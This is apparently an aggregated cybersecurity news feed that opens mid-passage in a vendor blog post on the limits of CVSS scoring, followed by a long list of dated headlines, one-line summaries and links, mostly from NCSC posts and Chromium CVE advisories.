could remain unaddressed and pose a latent and improperly categorized risk for the organization. In contrast, a leader should engage the context for vulnerability. Management may notice that the CVSS 5.0 vulnerability is trending on exploit feeds, has related ransomware exploits‌ and exists on highly critical servers. These additional “red flag” conditions mean the vulnerability may threaten the organization’s operations — and therefore must be appropriately prioritized based on risk.  In short, relying on CVSS alone is equivalent to tunnel vision and may leave organizations vulnerable. A better approach to vulnerability scoring A one-size-fits-all vulnerability score has limitations. Ivanti’s Vulnerability Risk Rating (VRR) goes beyond static CVSS scores by drawing on dynamic context and environmental factors to gauge risk. What factors are used to generate a vulnerability risk rating? VRR is defined by layering context on top of traditional CVSS inputs: CVSS scores: Used as an initial baseline. Exploitability: Is the vulnerability actively being exploited? Trends: Is the vulnerability featured in exploit kits, ransomware campaigns or other malicious tools? Severity dynamics: VRR is updated as new risks come on the scene, making it responsive and relevant to the latest threats. VRR informs organizations with real-world prioritization. In practice, this means that high-risk vulnerabilities don’t slip through the cracks while low-risk issues don’t put additional strain on teams who may already be spread thin. Proactive vulnerability management starts here Smart vulnerability management should be concerned with more than filling in gaps. It’s about broadening your view, too. Static, generic scoring systems no longer support the needs of the modern IT environment. With Ivanti’s VRR, organizations stand to gain a great deal. For one, you can rest assured that remediation efforts align with real-world risk. Visibility into organizational health and risk posture gives you an edge as you look to stay ahead of threats. Not to mention the ability to demonstrate reduced risk is essential for cyber insurance and compliance. Leveling up on vulnerability management means looking beyond the limitations of CVSS.

https://www.ivanti.com/blog/common-vulnerability-scoring-system-cvss
Threat Research Report: How AI Assistants, Co-Pilots, and Chatbots Create New Cyber Threats
2025-03-12T15:33:00Z | 1741793580

Artificial Intelligence (AI) has quickly become an integral part of modern workflows, with AI-powered applications like copilots, chatbots, and large-scale language models streamlining automation, decision-making, and data processing. However, these same tools introduce significant security risks—often in ways organizations fail to anticipate.

https://mixmode.ai/blog/threat-research-report-how-ai-assistants-co-pilots-and-chatbots-create-new-cyber-threats/
Chromium: CVE-2025-2137 Out of bounds read in V8
2025-03-12T15:32:42Z | 1741793562

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-2137
Chromium: CVE-2025-2136 Use after free in Inspector
2025-03-12T15:32:40Z | 1741793560

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-2136
Chromium: CVE-2025-2135 Type Confusion in V8
2025-03-12T15:32:38Z | 1741793558

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-2135
Chromium: CVE-2025-1920 Type Confusion in V8
2025-03-12T15:32:34Z | 1741793554

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/2024 ) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1920
Whatever Happened to the Vaunted Promises of Private 5G Networks?
2025-03-12T15:24:17Z | 1741793057

Private 5G networks were once heralded as the future of enterprise connectivity, offering unprecedented flexibility, faster speeds, and freedom from the limitations of wired networks. Yet, despite optimistic forecasts, the widespread adoption of private 5G has encountered significant roadblocks. This begs the burning...

https://www.netscout.com/blog/whatever-happened-vaunted-promises-private-5g-networks
Not all types of MFA are created equal...
2025-03-12T14:29:02Z | 1741789742

Our updated multi-factor authentication (MFA) guidance recommends organisations use techniques that give better protection against phishing attacks.

https://www.ncsc.gov.uk/blog-post/not-all-types-mfa-created-equal
New techniques added to the NCSC’s ‘risk management toolbox’
2025-03-12T14:28:07Z | 1741789687

Refreshed guidance published to help practitioners manage cyber risk.

https://www.ncsc.gov.uk/blog-post/new-techniques-added-to-the-ncsc-risk-management-toolbox
New legislation will help counter the cyber threat to our essential services
2025-03-12T14:27:37Z | 1741789657

The announcement of the Cyber Security and Resilience Bill is a landmark moment in tackling the growing threat to the UK's critical systems.

https://www.ncsc.gov.uk/blog-post/legislation-help-counter-cyber-threat-cni
New guidance for practitioners supporting victims of 'domestic cyber crime'
2025-03-12T14:26:23Z | 1741789583

The NCSC produces advice for practitioners working with victims who are being tracked, stalked, or virtually monitored.

https://www.ncsc.gov.uk/blog-post/new-guidance-for-practitioners-supporting-victims-of-domestic-cyber-crime
New cyber security training packages launched to manage supply chain risk
2025-03-12T14:25:55Z | 1741789555

NCSC publishes free e-learning to help organisations manage the cyber security risks across their supply chains.

https://www.ncsc.gov.uk/blog-post/new-cyber-security-training-packages-launched-to-manage-supply-chain-risk
New cloud guidance: how to 'lift and shift' successfully
2025-03-12T14:25:16Z | 1741789516

Henry O discusses the pitfalls of performing a basic ‘lift and shift’ cloud migration.

https://www.ncsc.gov.uk/blog-post/new-cloud-guidance-lift-shift-successfully
New 'Connected Places' infographic published
2025-03-12T14:24:50Z | 1741789490

A new visual guide to the cyber security principles that are essential when developing and managing ‘smart cities’.

https://www.ncsc.gov.uk/blog-post/new-connected-places-infographic-published
NCSC’s Cyber Advisor scheme milestone
2025-03-12T14:24:22Z | 1741789462

Cyber Advisor scheme for small organisations welcomes its 100th advisor, but more still needed!

https://www.ncsc.gov.uk/blog-post/ncsc-cyber-advisor-scheme-milestone
NCSC's cyber security training for staff now available
2025-03-12T14:23:40Z | 1741789420

The NCSC’s e-learning package 'Top Tips For Staff' can be completed online, or built into your own training platform.

https://www.ncsc.gov.uk/blog-post/ncsc-cyber-security-training-for-staff-now-available
NCSC IT: There's confidence and then there's SaaS
2025-03-12T14:23:20Z | 1741789400

Raising a cheer for SaaS vendors who respond to our cloud security principles.

https://www.ncsc.gov.uk/blog-post/ncsc-it-theres-confidence-and-then-theres-saas
NCSC For Startups: Vistalworks cracking down on illicit trade
2025-03-12T14:22:01Z | 1741789321

Vicky Brock of Vistalworks describes how the 'NCSC For Startups' programme has helped her organisation develop solutions to tackle illicit online trade.

https://www.ncsc.gov.uk/blog-post/ncsc-for-startups-vistalworks-cracking-down-on-illicit-trade
NCSC For Startups: the feedback loop
2025-03-12T14:20:46Z | 1741789246

How startups can make the most of their time when pitching to cyber security experts.

https://www.ncsc.gov.uk/blog-post/ncsc-for-startups-the-feedback-loop
NCSC for Startups: the case for collaboration
2025-03-12T14:19:16Z | 1741789156

Saj Huq of Plexal explains why collaboration with the NCSC brings opportunities to the cyber security sector.

https://www.ncsc.gov.uk/blog-post/ncsc-for-startups-the-case-for-collaboration
NCSC For Startups: taking on malvertising
2025-03-12T14:18:01Z | 1741789081

Can your startup help counter the rise of malicious advertising?

https://www.ncsc.gov.uk/blog-post/ncsc-for-startups-taking-on-malvertising
NCSC For Startups diaries: PORGiESOFT
2025-03-12T14:14:14Z | 1741788854

We caught up with George Brown, founder of PORGiESOFT, about his first few weeks in NCSC For Startups...

https://www.ncsc.gov.uk/blog-post/ncsc-for-startups-porgiesoft
How Rebellion Defence used NCSC For Startups to accelerate product development
2025-03-12T14:13:24Z | 1741788804

Unparalleled access to skilled users transformed Rebellion Defence’s product roadmap.

https://www.ncsc.gov.uk/blog-post/how-rebellion-defence-accelerate-product-development
NCSC for Startups: an ecosystem-based approach to cyber security
2025-03-12T14:12:57Z | 1741788777

Andrew Roughan, CEO of the NCSC’s innovation partner Plexal, explains why a whole-of-society approach is vital for cyber security innovation.

https://www.ncsc.gov.uk/blog-post/ncsc-for-startups-an-ecosystem-based-approach-to-cyber-security
Mythbusting cloud key management services
2025-03-12T14:10:36Z | 1741788636

Why trying to avoid trusting the KMS doesn't make sense (and other common misconceptions).

https://www.ncsc.gov.uk/blog-post/mythbusting-cloud-key-management-services
Moving to a cloud, not a storm
2025-03-12T14:09:48Z | 1741788588

Avoiding common problems when moving to the cloud.

https://www.ncsc.gov.uk/blog-post/move-to-a-cloud-not-a-storm
Motivating developers to write secure code
2025-03-12T14:09:11Z | 1741788551

The 'Motivating Jenny' project is helping to change the conversation about security in software development.

https://www.ncsc.gov.uk/blog-post/motivating-developers-to-write-secure-code
Migrating to post-quantum cryptography
2025-03-12T14:08:33Z | 1741788513

New guidance from the NCSC helps system and risk owners plan their migration to post-quantum cryptography (PQC).

https://www.ncsc.gov.uk/blog-post/migrating-to-post-quantum-cryptography-pqc
Mastering your supply chain
2025-03-12T14:07:56Z | 1741788476

A new collection of resources from the NCSC can help take your supply chain knowledge to the next level

https://www.ncsc.gov.uk/blog-post/mastering-your-supply-chain
Market incentives in the pursuit of resilient software and hardware
2025-03-12T14:06:44Z | 1741788404

A new paper from the ONCD explores how metrics can influence markets to improve the cyber security ecosystem.

https://www.ncsc.gov.uk/blog-post/market-incentive-the-pursuit-for-resilient-software-hardware
Making the UK the safest place to live and do business online
2025-03-12T14:04:23Z | 1741788263

The NCSC's Chief Executive Ciaran Martin outlines why the UK needs a National Cyber Security Centre.

https://www.ncsc.gov.uk/blog-post/ciaran
Making Principles Based Assurance a reality
2025-03-12T14:03:41Z | 1741788221

An update on the work to make Principles Based Assurance (PBA) usable in practice.

https://www.ncsc.gov.uk/blog-post/making-principles-based-assurance-a-reality
Machine learning security principles updated
2025-03-12T14:03:18Z | 1741788198

Revised principles will help people make the right security decisions when developing systems with AI/ML components.

https://www.ncsc.gov.uk/blog-post/machine-learning-security-principles-updated
Looking back at the ballot – securing the general election
2025-03-12T14:01:53Z | 1741788113

NCSC CEO Felicity Oswald shares reflections on keeping the 2024 General Election safe.

https://www.ncsc.gov.uk/blog-post/looking-back-at-the-ballot-securing-the-general-election
Log4j vulnerability: what should boards be asking?
2025-03-12T14:00:48Z | 1741788048

Advice for board members of medium to large organisations that are at risk from the Apache Log4j vulnerability.

https://www.ncsc.gov.uk/blog-post/log4j-vulnerability-what-should-boards-be-asking
Leveraging NCSC’s national insight to strengthen the fight against mobile threats
2025-03-12T13:59:37Z | 1741787977

Traced Mobile Security co-founder Benedict Jones describes how 'NCSC for Startups' helped evolve his business.

https://www.ncsc.gov.uk/blog-post/leveraging-ncsc-insight-fight-against-mobile-threats
Introducing the guidelines for secure AI
2025-03-12T13:57:59Z | 1741787879

New guidelines will help developers make informed decisions about the design, development, deployment and operation of their AI systems.

https://www.ncsc.gov.uk/blog-post/introducing-guidelines-secure-ai-system-development
Introducing Scanning Made Easy
2025-03-12T13:56:38Z | 1741787798

Trial project makes vulnerability scanning easier.

https://www.ncsc.gov.uk/blog-post/introducing-scanning-made-easy
Introducing PDNS for Schools
2025-03-12T13:55:22Z | 1741787722

Launching the first phase rollout of a protective DNS service for schools.

https://www.ncsc.gov.uk/blog-post/introducing-pdns-for-schools
Introducing Cyber Advisors...
2025-03-12T13:54:38Z | 1741787678

Launching a new Industry Assurance scheme aimed at helping the UK’s small organisations.

https://www.ncsc.gov.uk/blog-post/introducing-cyber-advisors
Introducing Active Cyber Defence 2.0
2025-03-12T13:53:54Z | 1741787634

ACD 2.0 aims to build the next generation of services in partnership with industry and academia.

https://www.ncsc.gov.uk/blog-post/introducing-active-cyber-defence-2
Interactive administration in the cloud: managing the risks
2025-03-12T13:53:22Z | 1741787602

Tips to help you secure and reduce interactive access to your cloud infrastructure.

https://www.ncsc.gov.uk/blog-post/interactive-administration-cloud-managing-risk
NCSC CEO highlights important role Boards have to play in cyber security
2025-03-12T13:51:52Z | 1741787512

NCSC CEO Lindy Cameron reflects on the importance of Board-level engagement with cyber security.

https://www.ncsc.gov.uk/news/ncsc-ceo-highlights-important-role-boards-have-to-play-in-cyber-security
NCSC CEO at UK-INDIA Week 2023
2025-03-12T13:51:30Z | 1741787490

Lindy Cameron discusses the shared opportunities and threats to both nations in cyberspace at UK-INDIA Week 2023.

https://www.ncsc.gov.uk/news/ncsc-ceo-at-uk-india-week-2023
Intelligent security tools: are they a smart choice for you?
2025-03-12T13:51:18Z | 1741787478

What you need to know before buying artificially intelligent security products

https://www.ncsc.gov.uk/blog-post/intelligent-security-tools-are-they-a-smart-choice-for-you
NCSC CEO appears at major US cyber security summit
2025-03-12T13:51:13Z | 1741787473

Lindy Cameron discussed cyber security at the 13th Billington Cyber Security Summit in Washington.

https://www.ncsc.gov.uk/news/ncsc-ceo-billington
Identifying suspicious credential usage
2025-03-12T13:49:33Z | 1741787373

How NCSC guidance can help organisations detect and protect themselves from credential abuse.

https://www.ncsc.gov.uk/blog-post/identifying-suspicious-credential-usage
How to talk to board members about cyber
2025-03-12T13:48:08Z | 1741787288

New guidance helps CISOs communicate with Boards to improve oversight of cyber risk.

https://www.ncsc.gov.uk/blog-post/how-to-talk-to-board-members-about-cyber
NCSC CEO and Information Commissioner sign Memorandum of Understanding
2025-03-12T13:47:18Z | 1741787238

The joint MoU sets out how the organisations will cooperate to improve the UK's digital resilience.

https://www.ncsc.gov.uk/news/ncsc-ceo-and-information-commissioner-sign-memorandum-of-understanding
How the NCSC thinks about security architecture
2025-03-12T13:47:10Z | 1741787230

Richard C explains how an understanding of vulnerabilities - and their exploitation - informs how the NCSC assesses the security of computer systems.

https://www.ncsc.gov.uk/blog-post/how-ncsc-thinks-about-security-architecture
NCSC announces Richard Horne as new CEO
2025-03-12T13:47:01Z | 1741787221

Richard Horne appointed new CEO of the National Cyber Security Centre and GCHQ Board member.

https://www.ncsc.gov.uk/news/ncsc-annouces-new-ceo
NCSC announces new joint directors for software security research institute
2025-03-12T13:46:43Z | 1741787203

The National Cyber Security Centre (NCSC) has announced new joint directors for one of its academic research institutes, which specialises in software security and safety.

https://www.ncsc.gov.uk/news/ncsc-announces-new-joint-directors-for-software-security-research-institute
How CyberFish's founder got hooked on Cheltenham
2025-03-12T13:46:41Z | 1741787201

Berta Pappenheim, CEO and co-founder of CyberFish, explains how the NCSC For Startups programme has transformed her professional and personal life.

https://www.ncsc.gov.uk/blog-post/how-cyberfish-s-founder-got-hooked-on-cheltenham
NCSC and partners issue warning over North Korean state-sponsored cyber campaign to steal military and nuclear secrets
2025-03-12T13:46:31Z | 1741787191

Critical infrastructure organisations are strongly encouraged to stay vigilant to DPRK-sponsored cyber operations.

https://www.ncsc.gov.uk/news/ncsc-partners-vigilant-dprk-sponsored-cyber-campaign
Helping banish malicious adverts – and drive a secure advertising ecosystem
2025-03-12T13:44:52Z | 1741787092

If your brand uses digital advertising, the NCSC has new guidance to help you choose a security-minded partner.

https://www.ncsc.gov.uk/blog-post/helping-banish-malicious-adverts
Helping organisations - and researchers - to manage vulnerability disclosure
2025-03-12T13:44:23Z | 1741787063

Ollie N explains the thinking behind the NCSC’s new Vulnerability Disclosure Toolkit, which is now available to download.

https://www.ncsc.gov.uk/blog-post/helping-to-manage-vulnerability-disclosure
Funded cyber certification helps small charities to provide legal aid to vulnerable citizens
2025-03-12T13:42:12Z | 1741786932

How the funded Cyber Essentials Programme helped the ‘Law Centres Network’ protect its IT estate - and client data - from cyber attacks.

https://www.ncsc.gov.uk/blog-post/funded-cyber-essentials-help-small-charities
From the cyber proliferation threat all the way to Pall Mall
2025-03-12T13:39:47Z | 1741786787

The first dedicated conference on this topic – and an insight into the NCSC assessment work behind it.

https://www.ncsc.gov.uk/blog-post/cyber-proliferation-threat-conference
NCSC and partners issue advice to help network defenders mitigate targeting of CISCO firewall platforms
2025-03-12T13:21:23Z | 1741785683

Joint advisory and malware analysis reports published to help mitigate malicious activity targeting certain Cisco devices.

https://www.ncsc.gov.uk/news/ncsc-partners-advice-mitigate-cisco-firewall-targeting
NCSC and partners issue advice to counter China-linked campaign targeting thousands of devices
2025-03-12T13:21:09Z | 1741785669

Joint advisory highlights the risk of malicious cyber actors exploiting internet-connected devices and gives mitigation advice.

https://www.ncsc.gov.uk/news/ncsc-and-partners-issue-advice-to-counter-china-linked-campaign-targeting-thousands-of-devices
NCSC and law enforcement encourage vigilance when shopping online this Christmas
2025-03-12T13:20:57Z | 1741785657

Campaign launched to help keep online shoppers more secure in the run up to Christmas.

https://www.ncsc.gov.uk/news/ncsc-and-law-enforcement-encourage-vigilance-when-shopping-online-this-christmas
NCSC and allies publish advisory on the most commonly exploited vulnerabilities in 2021
2025-03-12T13:20:43Z | 1741785643

A joint advisory from the NCSC and international partners details the 15 most commonly exploited vulnerabilities in 2021.

https://www.ncsc.gov.uk/news/ncsc-and-allies-publish-advisory-on-the-most-commonly-exploited-vulnerabilities-in-2021
NCSC advises organisations to act following Russia’s attack on Ukraine
2025-03-12T13:20:31Z | 1741785631

Organisations should follow NCSC advice and take action to improve their resilience with the cyber threat heightened.

https://www.ncsc.gov.uk/news/organisations-urged-to-bolster-defences
NCSC and international partners shine a light on Lockbit ransomware threat
2025-03-12T13:20:15Z | 1741785615

New advisory recommends mitigations for network defenders to take against the ransomware strain most globally deployed.

https://www.ncsc.gov.uk/news/ncsc-international-partners-lockbit-ransomware-threat
National Cyber Security Centre CTO: The tech market isn't working
2025-03-12T13:19:59Z | 1741785599

Ollie Whitehouse will say in his keynote speech that companies globally know how to build resilient, secure technology, but the market does not incentivise them to do so.

https://www.ncsc.gov.uk/news/ncsc-cto-the-tech-market-is-not-working
Nation of digital defenders blow the whistle on over 10 million suspect emails
2025-03-12T13:16:20Z | 1741785380

Milestone number of suspect emails reported by the British public marks launch of new Cyber Aware campaign.

https://www.ncsc.gov.uk/news/nation-of-digital-defenders-blow-the-whistle-on-over-10-million-suspect-emails
Microsoft update on brute force and password spraying activity
2025-03-12T13:15:30Z | 1741785330

The NCSC has issued advice to UK organisations following an update from Microsoft on malicious cyber campaigns.

https://www.ncsc.gov.uk/news/microsoft-update-brute-force-password-spraying
Legal firms urged to strengthen cyber defences with latest guidance from experts
2025-03-12T13:15:09Z | 1741785309

Updated report from the NCSC highlights the key threats that the UK legal sector face and how to improve their cyber security.

https://www.ncsc.gov.uk/news/legal-firms-urged-to-strengthen-cyber-defences
Leading women in tech urge schoolgirls to take on the UK's flagship cyber security contest
2025-03-12T13:14:56Z | 1741785296

Registration opens for the CyberFirst Girls competition 2023.

https://www.ncsc.gov.uk/news/schoolgirls-urged-to-take-on-the-uks-flagship-cyber-security-contest
Joint US - UK statement on malicious cyber activity carried out by Russian government
2025-03-12T13:14:43Z | 1741785283

The NCSC, FBI and DHS have issued a joint Technical Alert about malicious cyber activity carried out by the Russian Government.

https://www.ncsc.gov.uk/news/joint-us-uk-statement-malicious-cyber-activity-carried-out-russian-government
Joint security guidance offered to data centre operators and users
2025-03-12T13:13:42Z | 1741785222

New guidance from the NCSC and CPNI sets out a holistic security strategy for data centres to keep the UK's online assets secure.

https://www.ncsc.gov.uk/news/joint-security-guidance-offered-to-data-centre-operators-and-users
Joint advisory: Further TTPs associated with SVR cyber actors
2025-03-12T13:13:28Z | 1741785208

The NCSC, CISA, FBI and NSA publish advice on detection and mitigation of SVR activity following the attribution of the SolarWinds compromise.

https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors
Joint advisory on MuddyWater actor
2025-03-12T13:13:16Z | 1741785196

A joint advisory with international partners on the Iranian actor MuddyWater.

https://www.ncsc.gov.uk/news/joint-advisory-observes-muddywater-actors-conducting-cyber-espionage
Joint advisory highlights Microsoft Exchange and Fortinet vulnerabilities
2025-03-12T13:13:04Z | 1741785184

A joint advisory with international partners highlights an Iranian APT exploiting Microsoft Exchange and Fortinet vulnerabilities

https://www.ncsc.gov.uk/news/microsoft-exchange-fortinet-vulnerabilities
Joint advisory highlights increased globalised threat of ransomware
2025-03-12T13:12:44Z | 1741785164

The NCSC and international partners observe an increase in sophisticated, high-impact ransomware incidents against critical infrastructure organisations.

https://www.ncsc.gov.uk/news/joint-advisory-highlights-increased-globalised-threat-of-ransomware
LABScon24 Replay | Resilience and Protection in the Windows Ecosystem
2025-03-12T13:00:47Z | 1741784447

Kim Zetter interviews David Weston on topics such as the fallout from the CrowdStrike outage, Windows Recall and improving Microsoft security.

https://www.sentinelone.com/labs/labscon24-replay-resilience-and-protection-in-the-windows-ecosystem/
Faster, Smarter, Cheaper: The Networking Revolution Powering Generative AI
2025-03-12T13:00:00Z | 1741784400

AI models have rapidly evolved from GPT-2 (1.5B parameters) in 2019 to models like GPT-4 (1+ trillion parameters) and DeepSeek-V3 (671B parameters, using Mixture-of-Experts). More parameters enhance context understanding and text/image generation but increase computational demands. Modern AI is now multimodal, handling text, images, audio, and video (e.g., GPT-4V, Gemini), and task-specific, fine-tuned for applications like drug discovery, financial modeling or coding. As AI models continue to scale and evolve, they require massive parallel computing, specialized hardware (GPUs, TPUs), and crucially, optimized networking to ensure efficient training and inference.

https://blogs.arista.com/blog/modern-ai
International leaders to take centre stage at CYBERUK 2023 in Belfast
2025-03-12T12:33:01Z | 1741782781

Top officials from the U.S., Canada, New Zealand and Singapore amongst speakers for CYBERUK 2023 announced today.

https://www.ncsc.gov.uk/news/international-leaders-to-take-centre-stage-at-cyberuk-2023-in-belfast
International cyber security leaders to appear at flagship UK conference
2025-03-12T12:32:45Z | 1741782765

The UK government's CYBERUK 2022 event takes place 10-11 May at the ICC Wales.

https://www.ncsc.gov.uk/news/international-cyber-security-leaders-to-appear-at-flagship-uk-conference
Hostile state actors compromising UK organisations with focus on engineering and industrial control companies
2025-03-12T12:32:23Z | 1741782743

This advisory highlights the sustained risk to UK companies involved as well as providing further details on the activity and guidance for any organisations affected.

https://www.ncsc.gov.uk/news/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control
Heightened threat of state-aligned groups against western critical national infrastructure
2025-03-12T12:32:02Z | 1741782722

This alert highlights the emerging risk posed by state-aligned adversaries following the Russian invasion of Ukraine.

https://www.ncsc.gov.uk/news/heightened-threat-of-state-aligned-groups
Global ransomware threat expected to rise with AI, NCSC warns
2025-03-12T12:31:32Z | 1741782692

New assessment focuses on how AI will impact the efficacy of cyber operations and the implications for the cyber threat over the next two years.

https://www.ncsc.gov.uk/news/global-ransomware-threat-expected-to-rise-with-ai
Girls gear up for codebreaking showdown as UK’s top cyber skills competition opens for registration
2025-03-12T12:31:18Z | 1741782678

Teams are encouraged to sign up for the CyberFirst Girls Competition 2024 / 25.

https://www.ncsc.gov.uk/news/girls-gear-up-for-codebreaking-showdown
Get future ready, set, go: CYBERUK 2024 theme revealed
2025-03-12T12:31:05Z | 1741782665

The conference will examine how the cyber community can harness the societal benefits of emerging technologies and crucially, secure them for the future.

https://www.ncsc.gov.uk/news/get-future-ready-set-go-cyberuk-2024-theme-revealed
GCHQ Director and US cyber chief among speakers confirmed for CYBERUK 2024
2025-03-12T12:30:35Z | 1741782635

NCSC announces colleagues and experts from across the globe to speak at this year’s conference in Birmingham.

https://www.ncsc.gov.uk/news/gchq-director-us-cyber-chief-confirmed-cyberuk-2024
Five Eyes launch shared security advice campaign for tech startups
2025-03-12T12:30:16Z | 1741782616

The Secure Innovation security guidance is being utilised across the Five Eyes intelligence partnership demonstrating the increased commitment between the nations.

https://www.ncsc.gov.uk/news/five-eyes-launch-shared-advice-tech-startups
Five Eyes cyber leaders provide threat briefing at major US conference
2025-03-12T12:30:04Z | 1741782604

NCSC CEO discusses how the global threat picture remains unpredictable at Aspen Cyber Summit with fellow cyber security leaders.

https://www.ncsc.gov.uk/news/five-eyes-cyber-leaders-provide-threat-briefing-at-major-us-conference
Festive shoppers urged to be Cyber Aware as figures reveal average online losses of £1,000
2025-03-12T12:29:52Z | 1741782592

Cyber security and law enforcement partners join together to issue warning ahead of Black Friday and Christmas sales.

https://www.ncsc.gov.uk/news/festive-shoppers-urged-to-be-cyber-aware
Exercise caution when building off LLMs
2025-03-12T12:28:05Z | 1741782485

Large Language Models are an exciting technology, but our understanding of them is still 'in beta'.

https://www.ncsc.gov.uk/blog-post/exercise-caution-building-off-llms
Erasing data from donated devices
2025-03-12T12:27:47Z | 1741782467

How charities can erase personal data from donated laptops, phones and tablets, before passing them on.

https://www.ncsc.gov.uk/blog-post/erasing-data-from-donated-devices
Eradicating trivial vulnerabilities, at scale
2025-03-12T12:27:25Z | 1741782445

A new NCSC research paper aims to reduce the presence of ‘unforgivable’ vulnerabilities.

https://www.ncsc.gov.uk/blog-post/eradicating-trivial-vulnerabilities-at-scale
Equities process
2025-03-12T12:27:05Z | 1741782425

Publication of the UK’s process for how we handle vulnerabilities.

https://www.ncsc.gov.uk/blog-post/equities-process
Early Warning is joining MyNCSC
2025-03-12T12:26:23Z | 1741782383

Early Warning, one of the NCSC’s flagship ACD services, will be soon be migrated to the MyNCSC platform. Here we explain the background and what users can expect.

https://www.ncsc.gov.uk/blog-post/early-warning-is-joining-myncsc
Drawing good architecture diagrams
2025-03-12T12:25:48Z | 1741782348

Some tips on good diagram drafting and pitfalls to avoid when trying to understand a system in order to secure it.

https://www.ncsc.gov.uk/blog-post/drawing-good-architecture-diagrams
Exploitation of vulnerability affecting Palo Alto GlobalProtect Gateway
2025-03-12T12:25:42Z | 1741782342

The NCSC is encouraging organisations to take immediate action to mitigate a vulnerability affecting Palo Alto GlobalProtect Gateway and to follow the latest vendor advice.

https://www.ncsc.gov.uk/news/exploitation-palo-alto-globalprotect-gateway-vulnerability
Digital twins: secure design and development
2025-03-12T12:25:27Z | 1741782327

How existing NCSC guidance can assist those looking to develop and deploy ‘digital twins’.

https://www.ncsc.gov.uk/blog-post/digital-twins-secure-design-development
Exploitation of vulnerability affecting Fortinet FortiManager
2025-03-12T12:25:15Z | 1741782315

The NCSC is encouraging UK organisations to take immediate action to mitigate a vulnerability affecting Fortinet FortiManager (CVE-2024-47575) and to follow the latest vendor advice.

https://www.ncsc.gov.uk/news/vulnerability-fortinet-fortimanager
Defending software build pipelines from malicious attack
2025-03-12T12:25:06Z | 1741782306

Compromise of your software build pipeline can have wide-reaching impact; here's how to tackle the problem.

https://www.ncsc.gov.uk/blog-post/defending-software-build-pipelines-from-malicious-attack
Exploitation of vulnerabilities affecting Ivanti Connect Secure and Ivanti Policy Secure
2025-03-12T12:24:53Z | 1741782293

Organisations are encouraged to take immediate action to mitigate vulnerabilities affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) gateways (CVE-2023-46805, CVE-2024-21887, CVE-2024-21888 and CVE-2024-21893, CVE-2024-22024), and follow the latest vendor advice.

https://www.ncsc.gov.uk/news/exploitation-ivanti-vulnerabilities
Data-driven cyber: empowering government security with focused insights from data
2025-03-12T12:24:42Z | 1741782282

How 'small but actionable' insights can improve behaviours and decision making.

https://www.ncsc.gov.uk/blog-post/data-driven-cyber-empowering-security-focused-insights
Exploitation of vulnerabilities affecting Cisco firewall platforms
2025-03-12T12:23:34Z | 1741782214

The NCSC advises organisations to take immediate action to mitigate vulnerabilities affecting Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software (CVE-2024-20353, CVE-2024-20358, CVE-2024-20359) and follow the latest vendor advice.

https://www.ncsc.gov.uk/news/exploitation-vulnerabilities-affecting-cisco-firewall-platforms
New interactive video - and related downloads - to help secondary school kids stay safe online
2025-03-12T12:23:23Z | 1741782203

A new initiative, aimed at 11 to 14-year-olds, that helps them navigate the risks of online life.

https://www.ncsc.gov.uk/blog-post/cyberfirst-navigators-interactive-video-and-downloads-help-secondary-school-kids-stay-safe-online
Exploitation of Cisco IOS XE vulnerabilities affecting UK organisations
2025-03-12T12:23:11Z | 1741782191

Organisations are encouraged to take action to mitigate vulnerabilities affecting Cisco IOS XE (CVE-2023-20198 and CVE-2023-20273) and follow the latest vendor advice.

https://www.ncsc.gov.uk/news/cisco-ios-xe-vulnerabilities
CyberFirst industries support CyberTV for students
2025-03-12T12:23:03Z | 1741782183

Cyber security-themed videos, blogs and interviews from industry experts are supporting students and teachers.

https://www.ncsc.gov.uk/blog-post/cyberfirst-industries-support-cybertv
Cyber Security Toolkit for Boards: updated briefing pack released
2025-03-12T12:22:41Z | 1741782161

New presentation includes voiceover and insights on ransomware attack on the British Library.

https://www.ncsc.gov.uk/blog-post/cyber-security-toolkit-for-boards-updated-briefing-pack-released
Cyber security for schools
2025-03-12T12:22:17Z | 1741782137

New NCSC training package to help schools improve their cyber security.

https://www.ncsc.gov.uk/blog-post/cyber-security-for-schools
Cyber Resilience Audit scheme open to applications
2025-03-12T12:22:00Z | 1741782120

A new NCSC scheme assuring providers of CAF-based audits is now open for potential members.

https://www.ncsc.gov.uk/blog-post/cyber-resilience-audit-scheme-open
Cyber Resilience Audit (CRA) scheme launches for assured CAF-based audits
2025-03-12T12:21:40Z | 1741782100

NCSC-assured CRA service now offering Cyber Assessment Framework based audits and more applications invited from potential service providers.

https://www.ncsc.gov.uk/blog-post/cra-scheme-launches
Cyber Essentials: are there any alternative standards?
2025-03-12T12:21:21Z | 1741782081

Can an equivalent cyber security standard deliver the same outcomes as the NCSC’s Cyber Essentials scheme?

https://www.ncsc.gov.uk/blog-post/cyber-essentials-are-there-any-alternative-standards
Cyber Essentials Plus is for charities too!
2025-03-12T12:21:03Z | 1741782063

Sara Ward, the CEO of Black Country Women's Aid, discusses her organisation's experience of gaining Cyber Essentials Plus certification.

https://www.ncsc.gov.uk/blog-post/cyber-essentials-plus-is-for-charities-too
Experts reveal latest insights into world of cyber criminals
2025-03-12T12:20:45Z | 1741782045

Joint white paper from the NCSC and NCA details how organised criminal groups have evolved as ransomware and extortion attacks have grown.

https://www.ncsc.gov.uk/news/experts-reveal-insights-cyber-crime-ecosystem
Cyber Essentials 'Pathways': From experiment to proof of concept
2025-03-12T12:20:20Z | 1741782020

We are encouraging large organisations to help us develop an alternative route to certification.

https://www.ncsc.gov.uk/blog-post/cyber-essentials-pathway-proof-of-concept
Experts challenge myths around reporting cyber attacks to help break cycle of crime
2025-03-12T12:20:15Z | 1741782015
